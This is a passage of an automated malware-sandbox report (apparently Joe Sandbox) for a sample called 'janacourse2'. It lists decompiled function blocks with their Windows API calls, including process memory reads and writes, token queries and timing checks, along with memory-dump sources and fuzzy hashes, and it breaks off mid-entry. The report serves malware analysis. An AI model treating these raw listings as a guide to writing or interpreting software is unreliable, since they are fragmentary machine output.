                                                                                                            • API ID: ErrorLast$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3170660625-0
                                                                                                            • Opcode ID: 6ff1ea1851743f2391edf07d6d4ad92cb354f4ca777403de0faf81d91c6645c4
                                                                                                            • Instruction ID: c5791446151eb6b777cc0111172de7e30ebff2364528751ed2b2b2d77e2c9436
                                                                                                            • Opcode Fuzzy Hash: 6ff1ea1851743f2391edf07d6d4ad92cb354f4ca777403de0faf81d91c6645c4
                                                                                                            • Instruction Fuzzy Hash: 49017D779066D027D76226376D8AD2F376DABC1371B354028F490A3186FF3D8C007120
                                                                                                            APIs
                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?,?,0101035E), ref: 0101002B
                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010046
                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010054
                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?), ref: 01010064
                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0100FF41,80070057,?,?), ref: 01010070
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 3897988419-0
                                                                                                            • Opcode ID: ab98307055b3c1e37b0cc5fb9aef048be43f49bb54f51ced3ce4e3f3798b5dc8
                                                                                                            • Instruction ID: dece58df05c3487851917972a6b0bd671fc611965d8f58cab49534219908aa04
                                                                                                            • Opcode Fuzzy Hash: ab98307055b3c1e37b0cc5fb9aef048be43f49bb54f51ced3ce4e3f3798b5dc8
                                                                                                            • Instruction Fuzzy Hash: F50184B6601205BFFB214F68DD44BAA7EEDEB44661F144118F9C5D2208E77ADA808760
                                                                                                            APIs
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0101E997
                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0101E9A5
                                                                                                            • Sleep.KERNEL32(00000000), ref: 0101E9AD
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0101E9B7
                                                                                                            • Sleep.KERNEL32 ref: 0101E9F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                            • String ID:
                                                                                                            • API String ID: 2833360925-0
                                                                                                            • Opcode ID: afca01d70249ca72f991e66c4cf54544a69984cbe60a5311f55888fd93b232f7
                                                                                                            • Instruction ID: 2a9f290ffaf862957a4b7d1b86dc26d1b5361b57c2383d1adefc37ac19497064
                                                                                                            • Opcode Fuzzy Hash: afca01d70249ca72f991e66c4cf54544a69984cbe60a5311f55888fd93b232f7
                                                                                                            • Instruction Fuzzy Hash: 01018775C0262DDBDF51ABE4DA88AEDBB79BF09700F000546E982B2248CB3995408BA1
                                                                                                            APIs
                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011114
                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011120
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 0101112F
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011136
                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101114D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 842720411-0
                                                                                                            • Opcode ID: 57aa965f784cfa577d9ef4f5ffb07deab41dbcf2bf4a240ba16c8c789941a1bd
                                                                                                            • Instruction ID: 333897b95f0d887bcb6831679c31ccce2f351feb8608202d7c9c8918e86551a9
                                                                                                            • Opcode Fuzzy Hash: 57aa965f784cfa577d9ef4f5ffb07deab41dbcf2bf4a240ba16c8c789941a1bd
                                                                                                            • Instruction Fuzzy Hash: 000181B9101205BFEB654FA9DE89E6A3FAEFF86264B100454FA81C3354DB36DC008B60
                                                                                                            APIs
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01010FCA
                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01010FD6
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01010FE5
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01010FEC
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01011002
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 44706859-0
                                                                                                            • Opcode ID: 07ad69463d69f417952cde7d7b35cf253099c3f2e1d46745bafd59d6122e0f87
                                                                                                            • Instruction ID: 27bfed43911b5bd3f74573274e421429d554c878795f51d80de5bc58fb20fdfb
                                                                                                            • Opcode Fuzzy Hash: 07ad69463d69f417952cde7d7b35cf253099c3f2e1d46745bafd59d6122e0f87
                                                                                                            • Instruction Fuzzy Hash: 8CF0C279202301ABE7220FA8DE8DF563FADEF8A762F100414FA85C7244CA79D8408B60
                                                                                                            APIs
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0101102A
                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01011036
                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011045
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0101104C
                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011062
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 44706859-0
                                                                                                            • Opcode ID: 8d5d579ffc416dbfde319c9c88d1fd74278e1046b01a451d644cdd6fdbacfd96
                                                                                                            • Instruction ID: 0599b31e41b9c09aaa38d150de413419c0f66d92b56fa6db8695b1f576a21d5a
                                                                                                            • Opcode Fuzzy Hash: 8d5d579ffc416dbfde319c9c88d1fd74278e1046b01a451d644cdd6fdbacfd96
                                                                                                            • Instruction Fuzzy Hash: D2F0C279202301ABE7221FA9EE88F563FADEF8A661F100414FA85C7244CA79D850CB60
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 01020324
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 01020331
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 0102033E
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 0102034B
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 01020358
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,0102017D,?,010232FC,?,00000001,00FF2592,?), ref: 01020365
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2962429428-0
                                                                                                            • Opcode ID: 64f8dee81ae23c19a6d5160a6bcc37c6f70c054d3f6b045d0a016da3db98f83c
                                                                                                            • Instruction ID: 40a4cc1a6049d10d24ad5951ffec8dfcff62583fcbbd422ba3f66ce0ea8ce3e3
                                                                                                            • Opcode Fuzzy Hash: 64f8dee81ae23c19a6d5160a6bcc37c6f70c054d3f6b045d0a016da3db98f83c
                                                                                                            • Instruction Fuzzy Hash: AF019072801B259FD7309F6AD880413FBF9BE502153158A7EE29652931C371A954CF80
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00FED752
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • _free.LIBCMT ref: 00FED764
                                                                                                            • _free.LIBCMT ref: 00FED776
                                                                                                            • _free.LIBCMT ref: 00FED788
                                                                                                            • _free.LIBCMT ref: 00FED79A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: d5e29d051c6813dccb64224551096c2fba74a0f458b32da4f0ad00f5017d8151
                                                                                                            • Instruction ID: f0d8279ca24b0af2952dea27763cb8e26bf14f6d34095ef47fed61ee0a63367c
                                                                                                            • Opcode Fuzzy Hash: d5e29d051c6813dccb64224551096c2fba74a0f458b32da4f0ad00f5017d8151
                                                                                                            • Instruction Fuzzy Hash: 45F06832D002896B86A5EB5AF9C6C1A77EDBB04330B951809F084E7906D73DFC406761
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 01015C58
                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 01015C6F
                                                                                                            • MessageBeep.USER32(00000000), ref: 01015C87
                                                                                                            • KillTimer.USER32(?,0000040A), ref: 01015CA3
                                                                                                            • EndDialog.USER32(?,00000001), ref: 01015CBD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3741023627-0
                                                                                                            • Opcode ID: c45e835be2edc8084b2d932e572713b4db6ebbf9efc7ebe4e2b605fa34fd2c90
                                                                                                            • Instruction ID: 732f77264bd3464e83097232c9096bfdde9213b8dd0a7adbe890caf41f5d3e4e
                                                                                                            • Opcode Fuzzy Hash: c45e835be2edc8084b2d932e572713b4db6ebbf9efc7ebe4e2b605fa34fd2c90
                                                                                                            • Instruction Fuzzy Hash: 4901A274501708AFFB305F10DF8EFA67BB8BB45B05F040299A6C2A50D5DBF9A9848B90
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00FE22BE
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • _free.LIBCMT ref: 00FE22D0
                                                                                                            • _free.LIBCMT ref: 00FE22E3
                                                                                                            • _free.LIBCMT ref: 00FE22F4
                                                                                                            • _free.LIBCMT ref: 00FE2305
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: fbc1f1e344200b0094c6a67e3d0c3aaeb9fe4dabcca6a32c65794dedcaaea052
                                                                                                            • Instruction ID: a558ab96f0b13fbb97a2cbadfe401c3a66f5fd483dfc59f3eee53406c8b51020
                                                                                                            • Opcode Fuzzy Hash: fbc1f1e344200b0094c6a67e3d0c3aaeb9fe4dabcca6a32c65794dedcaaea052
                                                                                                            • Instruction Fuzzy Hash: D5F030B18041558B97B2AF59F80280C3B78BB187707015506F4D0D626FD73E1412BBA6
                                                                                                            APIs
                                                                                                            • EndPath.GDI32(?), ref: 00FC95D4
                                                                                                            • StrokeAndFillPath.GDI32(?,?,010071F7,00000000,?,?,?), ref: 00FC95F0
                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00FC9603
                                                                                                            • DeleteObject.GDI32 ref: 00FC9616
                                                                                                            • StrokePath.GDI32(?), ref: 00FC9631
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2625713937-0
                                                                                                            • Opcode ID: dc17992c7443122473d604b016ef1bbaba73f3ce86d360cba076d7db1bd2a205
                                                                                                            • Instruction ID: be57289b4585dc9a5aa08c7a0f0d184672a38b70cf70c542f58deb5c21d6d752
                                                                                                            • Opcode Fuzzy Hash: dc17992c7443122473d604b016ef1bbaba73f3ce86d360cba076d7db1bd2a205
                                                                                                            • Instruction Fuzzy Hash: ACF03C3540E605AFEB365F65EB4DB683B61AB11332F048218F4E5550F8CB7A8992EF20
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __freea$_free
                                                                                                            • String ID: a/p$am/pm
                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                            • Opcode ID: 3d75d5e5e11928e224e1d053e2116617f478c4f0840e90207e41e9a87e89bd1a
                                                                                                            • Instruction ID: c84eeb388d7708f3e9ef833935927d09957751602a5b1e542a24c37c398d0b66
                                                                                                            • Opcode Fuzzy Hash: 3d75d5e5e11928e224e1d053e2116617f478c4f0840e90207e41e9a87e89bd1a
                                                                                                            • Instruction Fuzzy Hash: 3FD10572D00286CEDB249F6BC845BFEB7B5FF05320F28015AEA019B654D7799D80EB91
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FD0242: EnterCriticalSection.KERNEL32(0108070C,01081884,?,?,00FC198B,01082518,?,?,?,00FB12F9,00000000), ref: 00FD024D
                                                                                                              • Part of subcall function 00FD0242: LeaveCriticalSection.KERNEL32(0108070C,?,00FC198B,01082518,?,?,?,00FB12F9,00000000), ref: 00FD028A
                                                                                                              • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
                                                                                                              • Part of subcall function 00FD00A3: __onexit.LIBCMT ref: 00FD00A9
                                                                                                            • __Init_thread_footer.LIBCMT ref: 01037BFB
                                                                                                              • Part of subcall function 00FD01F8: EnterCriticalSection.KERNEL32(0108070C,?,?,00FC8747,01082514), ref: 00FD0202
                                                                                                              • Part of subcall function 00FD01F8: LeaveCriticalSection.KERNEL32(0108070C,?,00FC8747,01082514), ref: 00FD0235
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                            • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                            • API String ID: 535116098-3733170431
                                                                                                            • Opcode ID: 3b996b15ff2aabdb9002f418e8fa6f6de96c3ebd0e65433d4a17a676c4c622e2
                                                                                                            • Instruction ID: 3a37d04a0058e8654379e2a6c8133dd272efdd2757421b0a5ec0089a7569f5f5
                                                                                                            • Opcode Fuzzy Hash: 3b996b15ff2aabdb9002f418e8fa6f6de96c3ebd0e65433d4a17a676c4c622e2
                                                                                                            • Instruction Fuzzy Hash: 8B918FB1A00209EFCB05EF59D894DADB7B9FF89300F14809DF9865B252DB71AE41CB51
                                                                                                            APIs
                                                                                                              • Part of subcall function 0101B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010121D0,?,?,00000034,00000800,?,00000034), ref: 0101B42D
                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 01012760
                                                                                                              • Part of subcall function 0101B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010121FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0101B3F8
                                                                                                              • Part of subcall function 0101B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0101B355
                                                                                                              • Part of subcall function 0101B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01012194,00000034,?,?,00001004,00000000,00000000), ref: 0101B365
                                                                                                              • Part of subcall function 0101B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01012194,00000034,?,?,00001004,00000000,00000000), ref: 0101B37B
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010127CD
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0101281A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                            • Opcode ID: 5cde73fc3d4a3de9f1c99f97438ae22a11d4d8e49ad0fd1f6a6dcb88e4b97657
                                                                                                            • Instruction ID: f5648bea0781aeeed60c642b3a35b16865f0275fac73a8c3f7e0eb61bf008d6d
